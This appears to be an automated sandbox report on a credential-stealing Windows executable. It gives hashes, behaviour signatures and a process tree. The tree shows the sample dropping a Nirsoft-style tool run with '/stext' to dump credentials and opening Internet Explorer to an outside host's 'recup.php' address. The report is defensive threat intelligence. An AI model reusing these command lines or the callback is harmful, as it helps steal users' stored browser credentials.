Analysis

  • max time kernel
    72s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2022, 16:05

General

  • Target

    652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe

  • Size

    220KB

  • MD5

    6e1218085443b5d66f82cb98f9cca0b5

  • SHA1

    729ceb8815d87ef87a19a2bcdcba63ca35e85283

  • SHA256

    652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476

  • SHA512

    37b5016e6dbee243b8480c817457d72fb9a0cb78a725c010dfa50b219de560f44bb60e021abd5b55cbc62886581315b8c5aa1d1c645602512040e3c8b04de452

  • SSDEEP

    6144:EB9gvxc8jCA4AnyDfbmtezMP3P5HXt73:1eTMyDKtezMhHd

Score
9/10

Malware Config

Signatures

  • Nirsoft 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
    "C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\225488.exe
      "C:\Windows\225488.exe" /stext C:\Windows\225488.txt
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://dofushack2.myartsonline.com/recup.php?actif=Le_serveur_Dofus Conf_est_activé
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1680 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1112

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2LVV991J.txt

          Filesize

          608B

          MD5

          02cf93a6bda4834be70a068398d4e70a

          SHA1

          7ec414bdb7c419ca8fa3edef4f8cbf9000d511a9

          SHA256

          c76f2629f4ecb9fba426610916af3ef68c479d6d95f0c08ca69f58894f7979be

          SHA512

          aacabc3ff5a8d5fd0182ea2516c9588fe27408c49458d261ca0011dd7b663755fb2d37d5ded3986159e908fa6ea7ba76bb864ea594af1dac235137b83de5f328

        • C:\Windows\225488.exe

          Filesize

          63KB

          MD5

          113417b6a1a108eb22337602661e7a59

          SHA1

          c89f17a24058a33851d02561bcdae48f327c18c5

          SHA256

          152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2

          SHA512

          182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88

        • memory/828-54-0x0000000075A11000-0x0000000075A13000-memory.dmp

          Filesize

          8KB

        • memory/828-59-0x0000000000400000-0x000000000047B000-memory.dmp

          Filesize

          492KB

        • memory/828-60-0x00000000005C0000-0x00000000005D0000-memory.dmp

          Filesize

          64KB

        • memory/828-61-0x00000000020A0000-0x00000000020C5000-memory.dmp

          Filesize

          148KB

        • memory/828-62-0x00000000020A0000-0x00000000020C5000-memory.dmp

          Filesize

          148KB

        • memory/828-63-0x0000000000400000-0x000000000047B000-memory.dmp

          Filesize

          492KB

        • memory/828-64-0x00000000005C0000-0x00000000005CD000-memory.dmp

          Filesize

          52KB

        • memory/1472-58-0x0000000000400000-0x0000000000425000-memory.dmp

          Filesize

          148KB